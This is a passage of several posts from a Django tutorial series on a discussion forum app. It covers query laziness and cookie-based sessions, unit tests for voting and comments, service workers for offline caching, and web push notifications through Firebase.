q = q.filter(...)

this does not make three separate queries; in fact, it makes no query at all until the queryset is evaluated, at which point Django runs one combined query.
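To make the laziness visible (the field names are taken from the Post model shown earlier):

q = Post.objects.filter(title__icontains='django')  # no query yet
q = q.exclude(num_comments=0)                       # still no query
posts = list(q)  # evaluation happens here: Django runs ONE combined query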

Caching sessions

One thing we notice using django-debug-toolbar is that almost every page makes a query to retrieve the Django session.

Before cookie-based sessions

The query we are tackling is given below; since it runs in almost all places, we can simply eliminate it once and reap the benefits everywhere else.

SELECT ••• FROM "django_session" WHERE ("django_session"."session_key" = '''6z1ywga1kveh58ys87lfbjcp06220z47''' AND "django_session"."expire_date" > '''2017-05-03 10:56:18.957983''')

By default, Django stores the sessions in our database and expects us to occasionally prune out old entries which we would not be doing.

So on each request, we are doing one SQL query to get the session data and another to grab the User object information. This is really not required, and we can easily remove this load from our server. But the question remains: which store should we use? From an operational point of view, introducing a distributed data store like Redis just for this is not really required. Instead, we can simply use cookie-based sessions here.

Do note that we would not be using cookie-based sessions for highly secure sites but Charcha does not need to be highly secure.

How do we implement it?

Using cookie-based sessions is very easy. We can simply follow the steps given in this link. All we have to do is add the following to our settings.py (or common.py, as per Charcha) and watch the magic happen. We switch to storing our sessions in signed cookies, and thereby remove a SQL query from every single request to our site.

SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"

Now from the snapshot given below, we can see that our redundant query is removed.

After cookie-based sessions

Hence, we have accomplished our task of optimizing our site.

Summary

In this post, we discussed how one should proceed when optimizing a site. We tackled all the domains, discussed various techniques to optimize a Django site, and talked about tools like django-debug-toolbar that can be used for a site’s assessment.

This is the sixth post in the Django Blog Series. In this post we will discuss how implementing Django unit testing can give our app Charcha, a discussion forum application in Django, a better quality safety net. You can find the full code for the Charcha forum here.
Before diving into writing the unit tests for our app, we first need to understand why we actually need to write them and which scenarios should be covered by tests.

Why Should You Test Your Code?

“Quality is never an accident; it is always the result of intelligent effort.” – John Ruskin
Providing automated tests for your code is a way to repeatedly ensure, with minimal developer effort, that the code you wrote to handle a task works as advertised. I like to think of tests as my insurance policy. They generally keep me from breaking existing code & looking foolish to other people. They’re also concrete proof that the code works correctly. Without that proof, what you have is a pile of code that worked right once on your machine & that you’ll either have to hand-test again & again in the future, or that will break without you being any the wiser.
This is not to say that tests solve everything. There will always be bugs in software. Maybe the tests miss a code path or a user will use something in an unexpected way. But tests give you better confidence & a safety net.

Types Of Testing

There are many different types of testing. The prominent ones this series will cover are Django unit tests and integration tests.
Unit tests cover very small, highly specific areas of code. There are usually relatively few interactions with other areas of the software. This style of testing is very useful for critical, complicated components, such as validation, importing or methods with complex business logic.
Integration tests are at the opposite end of the spectrum. These tests usually cover multiple different facets of the application working together to produce a result. They ensure that data flow is right & often handle multiple user interactions.
The main difference between these two types is not the tooling but the approach and what you choose to test. It’s also a very common thing to mix & match these two types throughout your test suite as it is appropriate. In this post, we’ll focus only on unit testing.

When should you really test?

Another point of decision is whether to do test-first (a.k.a. Test Driven Development) or test-after. Test-first is where you write the necessary tests to demonstrate the proper behavior of the code before you write the code to solve the problem at hand. Test-after is when you’ve already written the code to solve the problem, then you go back & create tests to make sure the behavior of the code you wrote is correct.
This choice comes down to personal preference. An advantage of test-driven development is that it forces you to not skimp on the tests & think about the API up front. However, it feels very unnatural at first & if you have no experience writing tests, you may be at a loss as to what to do. Test-after feels more natural but can lead to weak tests if they’re hurried & not given the proper time/effort.
Something that is always appropriate, regardless of general style, is when you get a bug report. ALWAYS create a test case first & run your tests. Make sure it demonstrates the failure, THEN go fix the bug. If your fix is correct, that new test should pass! It’s an excellent way to sanity check yourself & is a great way to get started with testing to boot.

Let’s get to it

Now that we’ve got a solid foundation on the why, what & when of testing, we’re going to start diving into code. When you run python manage.py startapp, Django automatically creates a tests.py file within your app where we can write our tests.
Before writing the test cases we need to import the TestCase class and the models from our models.py. Here’s the snippet for it:

from django.test import TestCase
from django.contrib.auth.models import AnonymousUser
from .models import Post, Vote, Comment, User

 

Adding Tests to Views

class DiscussionTests(TestCase):
    def setUp(self):
        self._create_users()
    def _create_users(self):
        self.ramesh = User.objects.create_user(
            username="ramesh", password="top_secret")
        self.amit = User.objects.create_user(
            username="amit", password="top_secret")
        self.swetha = User.objects.create_user(
            username="swetha", password="top_secret")
        self.anamika = AnonymousUser()
    def new_discussion(self, user, title):
        post = Post(title=title,
            text="Does not matter",
            author=user)
        post.save()
        return post

This code sets up a new test case (DiscussionTests), which you can think of as a collection of related tests. Any method whose name starts with test_ will be run automatically & its output will be included in the testing output when we run the test command.
setUp is run before every test (and tearDown, if defined, runs after each one). This lets you set up a basic context or environment for each of your tests, and it ensures that no test edits the data that other tests depend on. This is a basic tenet of testing: each test should stand alone and not affect the others. When run, this snippet creates the respective users as User objects; new_discussion is a helper we will use to create a Post. We are going to use these as the base for the meaningful tests that we will write in a bit.
If at this stage we run the command python manage.py test discussions, we’ll get a result something like this:

Creating test database for alias 'default'...
----------------------------------------------------------------------
Ran 0 tests in 0.000s
OK
Destroying test database for alias 'default'...

Now, this is self-explanatory: no tests ran, since we haven’t written any actual test methods yet. Before writing some tests, we should also know about the test database that gets created when we run them.
Tests that require a database (namely, model tests) will not use your “real” (production) database; separate, blank databases are created for the tests.
Regardless of whether the tests pass or fail, the test databases are destroyed when all the tests have been executed.
You can prevent the test databases from being destroyed by using the test --keepdb option. This will preserve the test database between runs. If the database does not exist, it will first be created, and any migrations will also be applied in order to keep it up to date.
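For example, to run the discussions app’s tests while keeping the test database around between runs:

$ python manage.py test discussions --keepdb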

    def test_double_voting(self):
        post = self.new_discussion(self.ramesh, "Ramesh's Biography")
        self.assertEquals(post.upvotes, 0)
        post.upvote(self.amit)
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.upvotes, 1)
        post.upvote(self.amit)
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.upvotes, 1)

    def test_comments_ordering(self):
        _c1 = "See my Biography!"
        _c2 = "Dude, this is terrible!"
        _c3 = "Why write your biography when you haven't achieved a thing!"
        _c4 = "Seriously, that's all you have to say?"
        post = self.new_discussion(self.ramesh, "Ramesh's Biography")
        self.assertEquals(post.num_comments, 0)
        rameshs_comment = post.add_comment(_c1, self.ramesh)
        amits_comment = rameshs_comment.reply(_c2, self.amit)
        swethas_comment = rameshs_comment.reply(_c3, self.swetha)
        rameshs_response = amits_comment.reply(_c4, self.ramesh)
        comments = [c.text for c in
                    Comment.objects.best_ones_first(post.id, self.ramesh.id)]
        self.assertEquals(comments, [_c1, _c2, _c4, _c3])
        # check if num_comments in post object is updated
        post = Post.objects.get(pk=post.id)
        self.assertEquals(post.num_comments, 4)

As we discussed above, we need to determine the scenarios that should be covered with test cases in order to maintain quality assurance. The above snippet demonstrates a couple of scenarios for which we wrote test cases for our discussion forum. The tests are fairly self-explanatory: in the first one we check that a particular user cannot vote twice. The test starts a new discussion and then performs a series of upvotes and assertions, checking that the result is what we expect. In the second example we verify the correct order and count of the comments that are added to a discussion.
On running tests now, the result is:

Creating test database for alias 'default'...
..
----------------------------------------------------------------------
Ran 2 tests in 0.532s
OK
Destroying test database for alias 'default'...

Both of our tests passed and the test database created was destroyed.

Summary

Unit tests lay a solid foundation on which the rest of your testing process should be built. Opening your app up and taking the new feature you just developed for a test drive is always good practice. I think it comes down to mainly 3 reasons why unit testing our app is a boon for us:

  1. Knowing if our code really works.
  2. It saves us a lot of pain (and time).
  3. It makes deployments a snap.

Happy unit testing folks!

With Progressive Web Applications (PWAs), developers can deliver amazing app-like experiences to users using modern web technologies. It is an emerging approach designed to deliver functionality like push notifications and working offline, for a rich mobile experience. In this post, we will learn how to make your Django application progressive so that it works offline.

 

What are progressive web applications?

Progressive web applications are web applications with a rich user experience. They make user interaction with the web smooth, and have the following features:

A force that drives progressive web applications

The core concept behind a progressive web app is the service worker. A service worker is a script which the browser runs in the background, without interfering with the user’s interaction with the application. The work done by this script includes push notifications, content caching, and data sync when an internet connection is available.

 

There is a lot more to progressive web applications, but in this post we are mostly concerned with the connectivity-independence feature. We will learn how service workers help us get this done. This post is going to be about making a Django application work offline, and we will use Charcha as our reference application.

Let’s get started without any further delay.

 

Register a service worker

To bring the service worker into the loop, we need to register it in our application. Basically, this tells the browser where it needs to look for the service worker script. Put the following code snippet in a JavaScript file that gets loaded as soon as your application runs.

 

 

 var serviceWorkerPath = "/charcha-serviceworker.js";
 var charchaServiceWorker = registerServiceWorker(serviceWorkerPath);
 function registerServiceWorker(serviceWorkerPath){
    if('serviceWorker' in navigator){
      navigator.serviceWorker
        .register(serviceWorkerPath)
          .then(
            function(reg){
              console.log('charcha service worker registered');
            }
          ).catch(function(error){
            console.log(error)
          });
    }
 }

 

How does the above code work?

  1. It first checks whether the browser supports service workers at all ('serviceWorker' in navigator).
  2. If it does, it asks the browser to register the script located at serviceWorkerPath, i.e. /charcha-serviceworker.js.
  3. On a successful registration it logs a confirmation to the console; on failure it logs the error.

Launching your Django application

Now go ahead and launch your Django application and open the browser console. If a registration error shows up there, you should still be grateful to your browser for having service worker support: the registration was attempted, but something went wrong. Reload your application and you will see a detailed error message like the one below.

service worker registration failure

This is because Django could not find anything to render for request /charcha-serviceworker.js.
Our next step is to define a URL path and call a view for this path.

 

# urls.py
url(r'^charcha-serviceworker(.*.js)$', views.charcha_serviceworker, name='charcha_serviceworker'),

# views.py
from django.http import HttpResponse
from django.template.loader import get_template

def charcha_serviceworker(request, js):
    template = get_template('charcha-serviceworker.js')
    html = template.render()
    return HttpResponse(html, content_type="application/x-javascript")

What we are doing above is just returning our charcha-serviceworker.js whenever a request is made to download this file.

 

TEMPLATES = [
    {
        ...
'DIRS': [os.path.join(PROJECT_ROOT, 'templates'), os.path.join(PROJECT_ROOT, ''),],
        ...
        ...
    },
]

Notice that os.path.join(PROJECT_ROOT, 'templates') was the existing template path; os.path.join(PROJECT_ROOT, '') was added, enabling the get_template function to also search for the script file in the project root directory.

 

Now re-run your application; if you no longer see the previous error, you are good to go with writing the service worker script.

 

 

Install the service worker

When a service worker is registered, an install event is triggered the very first time a user visits the application page. This is where we cache all the resources needed for our application to work offline.
Open the previously created charcha-serviceworker.js and define a callback function which listens for the install event.

var cacheName = 'charcha';
var filesToCache = [
'/',
];
self.addEventListener('install', function(event) {
  event.waitUntil(
    caches.open(cacheName).then(function(cache) {
      return cache.addAll(filesToCache);
    })
  );
});

Let us see what’s going on here:

  1. It adds an event listener which listens for the install event.
  2. It opens a cache with the name charcha.
  3. It builds an array of files which need to be cached and passes it to the cache.addAll() function.
  4. event.waitUntil waits until the caching promise is resolved or rejected.
  5. The service worker is considered successfully installed only when it caches all the files successfully. If it fails to download and cache even a single file, the installation fails and the browser throws away this service worker.

Install occurs only once per service worker unless you update and modify the script. In that case, a fresh service worker is created without altering the existing running one. We will discuss this more when we get to the update phase of a service worker.

 

Re-run your application and open Chrome dev tools. Open the Service Workers pane in the Application panel. You will find your service worker with a running status, something like the screenshot below, confirming that the service worker is successfully installed.

service worker installed

You will see a list of cached files in the Cache Storage pane under Cache in the same Application panel.

NOTE: We can add all the static resources, like CSS files and image files, to the list of files to be cached. But a dynamic URL like /discuss/{post_id} cannot be defined in this list. So how do we cache wildcard URLs? We will see in the next section.

 

Intercept the request and return cached resources

Since we have installed our service worker, we are ready to roll and return responses from our cached resources. Once the service worker is installed, every new request triggers a fetch event. We can write a function which listens for this event and responds with the cached version of the requested resource. Our fetch event listener is going to look like:

self.addEventListener('fetch', function(event) {
  event.respondWith(
    caches.match(event.request).then(function(response) {
      return response || fetch(event.request);
    })
  );
});

Through the above code snippet, we try to fetch the requested resource from the list of cached resources. If it is found, the resource is returned from the cache; otherwise, we make a network request to fetch the resource and return it.

 

In the previous section, we saw the issue of caching dynamic URLs. Let’s see how we can resolve that inside the fetch event listener. Modify the previous code for the fetch event to look like:

self.addEventListener('fetch', function(event) {
  event.respondWith(
    caches.match(event.request)
      .then(function(response) {
        if (response) {
          return response;
        }
        var fetchRequest = event.request.clone();
        return fetch(fetchRequest).then(
          function(response) {
            if(!response || response.status !== 200 || response.type !== 'basic') {
              return response;
            }
            var responseToCache = response.clone();
            caches.open(cacheName)
              .then(function(cache) {
                cache.put(event.request, responseToCache);
              });
            return response;
          }
        );
      })
    );
});

Let’s walk through the code to see how it solves the aforementioned issue.

 

How the code solves the aforementioned issue

  1. If the requested resource is available in the cache, a cache hit occurs and the resource is returned from the cache.
  2. If a cache hit does not occur for the requested resource (which will be the case with dynamic URLs), a fresh fetch request is made to fetch the resource from the network.
  3. If the response is not valid, the status is not 200, or the response type is not basic, the response is returned as-is, because error responses need not be cached.
  4. If the response is valid, the status is 200, and the response type is basic, the response is first saved into the cache and then returned to the client.

You might wonder why we are cloning the request and response. Basically, a web request/response is a stream, and it can be consumed only once. In our code, we consume the request/response both for caching and for the fetch call. Once read, the stream is gone and is not available for the next read; in order to get a fresh request/response stream again, we clone it.

 

Now, with the above fetch event listener, we are sure that each newly requested resource is cached and returned when it is requested again.
At this stage, we are good to go and test the offline capability of our application. To test it, follow these steps:

 

  1. Rerun the application and browse through a few pages.
  2. Open chrome dev tools and open Service Workers pane in Application panel.
  3. Enable offline check box. After enabling it, you will see a yellow warning icon. This indicates that your application has gone offline.
  4. Now go and browse through all those pages which you previously visited and were cached. You will be able to access those pages without any network error.

 

Activate the service worker

service worker waiting

The activate event fires when a new service worker takes control, and it is the natural place to clean up old caches: the handler below deletes every cache whose key does not match the current cacheName.
self.addEventListener('activate', function(e) {
  e.waitUntil(
    caches.keys().then(function(keyList) {
      return Promise.all(keyList.map(function(key) {
        if (key !== cacheName) {
          return caches.delete(key);
        }
      }));
    })
  );
});

Now you can go gaga over it, because you have managed to make your Django application work offline.

 

Summary

You can make Django web apps faster, more engaging, and able to work offline. You just need to have service worker support in your target browser.

There is more to progressive web apps and service workers; hang around, because we will discuss them further in upcoming posts.

 

This is the fourth post in the Django Blog Series. In this post, we will go through the implementation of web push notifications for Google Chrome in Django. This post is inspired by the push notifications of the Charcha Discussion Forum. You can find the full code for the Charcha forum here.

Web push notifications require a service worker running in the browser through which the push notification can be delivered. The notification is sent through Firebase Cloud Messaging, enabling applications to interact with users even when they are not using the application.

Registering Application on Firebase

To send web push notifications to the client, you need to register your application on the Firebase Console.

Setting up Service Worker

// Register event listener for the 'push' event.
self.addEventListener('push', function(event) {
 // Parse the JSON payload sent with the push message.
 var payload = JSON.parse(event.data.text());
 // Keep the service worker alive until the notification is created.
 event.waitUntil(
   // Show a notification with title and use the payload
   // as the body.
   self.registration.showNotification(payload.title, payload.options)
 );
});
// Event Listener for notification click
self.addEventListener('notificationclick', function(event) {
 event.notification.close();
 event.waitUntil(
   clients.openWindow(<URL>)
 );
});

 

Subscribing or Unsubscribing Users

Create a JavaScript file which contains the code for subscribing to push notifications, registering the service worker, asking the user for notification permission, and storing the endpoint in the database.

Define the following variables:

var serviceWorkerSrc = "/static/serviceworker.js";
var callhome = function(status) {
  console.log(status);
}
var storage = window.localStorage;
var registration;

Define onPageLoad(), which will check for support and register the service worker. On successful registration of the service worker, it will call initialiseState(), which is defined in the next step.

 function onPageLoad() {
   // Do everything if the Browser Supports Service Worker
   if ('serviceWorker' in navigator) {
     navigator.serviceWorker.register(serviceWorkerSrc)
       .then(
         function(reg) {
           registration = reg;
           initialiseState(reg);
         }
       );
   }
   // If service worker not supported, show warning to the message box
   else {
     callhome("service-worker-not-supported");
   }
 }

 

Define initialiseState(), which will check whether notifications are supported by the browser. If notifications are supported, it will call subscribe(), which is defined in the next step.

 // Once the service worker is registered set the initial state
 function initialiseState(reg) {
   // Are Notifications supported in the service worker?
   if (!(reg.showNotification)) {
     callhome("showing-notifications-not-supported-in-browser");
     return;
   }
   // Check the current Notification permission.
   // If its denied, it's a permanent block until the
   // user changes the permission
   if (Notification.permission === 'denied') {
     callhome("notifications-disabled-by-user");
     return;
   }
   // Check if push messaging is supported
   if (!('PushManager' in window)) {
     // Show a message and activate the button
     console.log('push-notifications-not-supported-in-browser');
     return;
   }
   subscribe();
 }

 

Define subscribe() which tries to subscribe the user to push notification. If subscription does not exist, it will ask the user for notification permission. Once notification permission is granted, it will receive the subscription details which will be sent to postSubscribeObj() for processing.

If the user has already subscribed, the same subscription details will be returned.

 function subscribe() {
   registration.pushManager.getSubscription().then(
       function(existing_subscription) {
         // Check if Subscription is available
         if (existing_subscription) {
           endpoint = existing_subscription.toJSON()['endpoint']
           if (storage.getItem(endpoint) === 'failed') {
             postSubscribeObj('subscribe', existing_subscription);
           }
           return existing_subscription;
         }
         // If not, register one using the
         // registration object we got when
         // we registered the service worker
         registration.pushManager.subscribe({
           userVisibleOnly: true
         }).then(
           function(new_subscription) {
             postSubscribeObj('subscribe', new_subscription);
           }
         );
       }
     )
 }

Define unsubscribe() which will unsubscribe the user from the push notification by deleting the endpoint from the database.

It will get the subscription details from the pushManager and send it to postSubscribeObj() to update the subscription status on the server.

 function unsubscribe() {
   navigator.serviceWorker.ready.then(function(existing_reg) {
     // Get the Subscription to unregister
     registration.pushManager.getSubscription()
       .then(
         function(subscription) {
           // Check we have a subscription to unsubscribe
           if (!subscription) {
             return;
           }
           postSubscribeObj('unsubscribe', subscription);
         }
       )
   });
 }

Define postSubscribeObj() which updates the endpoint on the server by making an API call.

 function postSubscribeObj(statusType, subscription) {
   // Send the information to the server with fetch API.
   // the type of the request, the name of the user subscribing,
   // and the push subscription endpoint + key the server needs
   // to send push messages
   var subscription = subscription.toJSON();
   // API call to store the endpoint in the database
 }

Call onPageLoad() to initialize the worker status check and update subscription.

 onPageLoad();

Sending Web Push Notification

On successful subscription, an endpoint is stored which can be used to send notifications to the user. For Python, the pywebpush package can be used to send web push notifications.

The subscription JSON will be received on successful subscription. In the snippet below:

GCM_KEY - the server key from the Firebase console
ttl - Time to Live (integer)

Prerequisite

pywebpush dependency: explicitly add pyelliptic==1.5.7 in the requirements file, as newer versions have some issues.
import json
from pywebpush import WebPusher
subscription = {
   "endpoint": endpoint,
   "keys": {
       "auth": auth,
       "p256dh": p256dh
   }
}
payload = {
   "title": title,
   "options": options or {}
}
WebPusher(subscription).\
   send(json.dumps(payload), {}, ttl, GCM_KEY)

Summary

In this blog, you learned how to set up web push notifications for Google Chrome in Django.
Push Libraries- https://github.com/web-push-libs/
